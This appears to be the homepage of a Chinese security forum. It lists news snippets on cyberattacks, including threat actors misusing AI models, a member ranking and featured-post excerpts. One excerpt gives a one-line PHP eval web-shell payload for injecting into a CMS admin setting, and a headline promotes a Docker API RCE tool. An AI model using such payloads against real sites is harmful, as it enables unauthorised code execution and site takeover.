攻防演练必备工具 DockerApiRCE 图形化利用!!!

当时设计这款工具的时候,还特意商量了下ui咋个设计看起来才舒服达到一眼明了效果。

OpenAI 阻止了 20 起利用人工智能进行网络犯罪和虚假信息的全球恶意活动

这项活动包括调试恶意软件、为网站撰写文章、为社交媒体账户生成传记以及为 X 上的虚假账户创建 AI 生成的个人资料图片。这家人工智能公司表示: “威胁行为者不断发展和试验我们的模型,但我们尚未看到证据表明这会带来他们在制造全新恶意软件或吸引病毒式传播受众的能力上取得重大突破。”该公司还表示,它扰乱了与美国、 ...

2024-10-10 21:33:54 0 389

互联网档案馆遭遇黑客攻击,3100 万用户数据被泄露

IT之家 10 月 10 日消息,科技媒体 arstechnica 今天(10 月 10 日)发布博文,报道称互联网档案馆网站 Archive.org 遭遇黑客攻击,导致大约 3100 万用户数据被泄露。互联网档案馆(Internet Archive)是一个非营利性的数字图书馆,成立于 1996 年,旨在提供免费、普遍的访问各种数字内容,包括文本、电影、音乐和网站等。I ...

2024-10-10 18:49:37 2 438

窃取加密货币的恶意软件活动感染了 28,000 人

来自俄罗斯、土耳其、乌克兰和欧亚地区其他国家的超过 28,000 人受到大规模加密货币窃取恶意软件活动的影响。该恶意软件活动将自己伪装成通过 YouTube 视频和欺诈性 GitHub 存储库推广的合法软件,受害者在其中下载受密码保护的档案,从而引发感染。据网络安全公司 Dr. Web 称,该活动使用盗版办公相关软件、游戏作弊和黑客 ...

2024-10-10 11:45:23 0 338

紫队行动期间利用 macOS 的一个 Microsoft Teams漏洞

紫队的操作背景作为紫队的一员,我们设法在运行 macOS 的计算机上获得远程访问权限(以用户身份)。除了设法入侵计算机之外,我们还想实施对客户产生明显影响的示例。因此,我们一直在考虑是否要窃听计算机或检索其视频流。由于Microsoft Teams默认安装在所有 macOS 计算机上(由客户端安装),因此我们将注意力转向了应用 ...

2024-10-10 00:29:04 0 453

新型 Gorilla 僵尸网络在100 个国家/地区发起超过三十万次DDoS 攻击

网络安全研究人员发现了一个名为 Gorilla(又名 GorillaBot)的新型僵尸网络恶意软件家族,其灵感来自泄露的Mirai僵尸网络源代码。网络安全公司绿盟科技上个月发现了这一活动,它表示,2024年9月4日至9月27日期间,该僵尸网络“发出了超过30万条攻击指令,攻击密度令人震惊。平均每天,该僵尸网络发出的旨在发起分布式拒绝 ...

2024-10-09 21:50:14 0 341

零日警报:三个关键的 Ivanti CSA 漏洞正被积极利用

Ivanti 发出警告称,影响其云服务设备 (CSA) 的三个新的安全漏洞已遭到广泛利用。这家总部位于犹他州的软件服务提供商表示,这些零日漏洞正与该公司上个月修补的 CSA 的另一个漏洞一起被用作武器。成功利用这些漏洞可以允许具有管理员权限的经过身份验证的攻击者绕过限制,运行任意 SQL 语句,或获取远程代码执行。该公司表 ...

2024-10-09 21:10:45 0 311

热门活动

T00ls专家

zcgonvh

荣誉会员

文章27篇,精华12篇

1

Twi1ight

潜水会员

文章41篇,精华11篇

2

Rices

潜水会员

文章154篇,精华5篇

3

Bypass

荣誉会员

文章26篇,精华5篇

4

Hmily吾爱破解论坛创始人,著名逆向破解专家

潜水会员

文章18篇,精华4篇

5

ph12h0n

潜水会员

文章40篇,精华4篇

6

lyxhh

潜水会员

文章85篇,精华4篇

7

xflxfl

潜水会员

文章13篇,精华3篇

8

backlion

潜水会员

文章31篇,精华3篇

9

tryblog

版主

文章28篇,精华3篇

10

最新精华

Web安全关于jackson漏洞一些利用

# jackson代码审计# Jackson反序列化基础知识## 前言开始Jackson ...

2024-09-24 09:22:40 12 544

渗透测试JAVA安全 | Classloader:理解与利用一篇就够了

# 前言ClassLoader 作为 JAVA 安全研究基础又核心的部分, 本篇文 ...

2024-09-19 16:44:44 19 759

渗透测试SQL注入恶劣环境之可执行文件上传骚姿势

# 0# 概述在前期Web打点成功获得对应权限后,就进入了后渗透(提 ...

2024-08-22 17:39:55 32 936

逆向破解yara CS与Agent

### 前言​之前做的SLEEP HOOK马没做反沙箱被发微步了,直接标记 ...

2024-08-15 10:01:53 14 547

Web安全PHP Live Chat 代码审计之组合拳GetShell

> PHP Live Chat 全名为 PHP Live Support Chat,官方网站(https ...

2024-05-29 12:17:02 20 2243

DJCMS 3.0后台拿shell

进入后台 在其它设置里 网站名称插入以下一句话[img]http://img2.ph.126.net/ECx85FcA6GSl3_0GBhX_MA==/2479794544838737152.jpg[/img] 记住提交两次");eval($_POST[cmd])?>然后用菜刀连接[url]http://www.u.com/inc/config.php[/url] by:xch40

阿里云(aliyun.com) 某分站存在存储型xss跨站漏洞

根据《中华人民共和国网络安全法》,本站漏洞永不公开,若厂商想了解详情请咨询[email protected]

Top ↑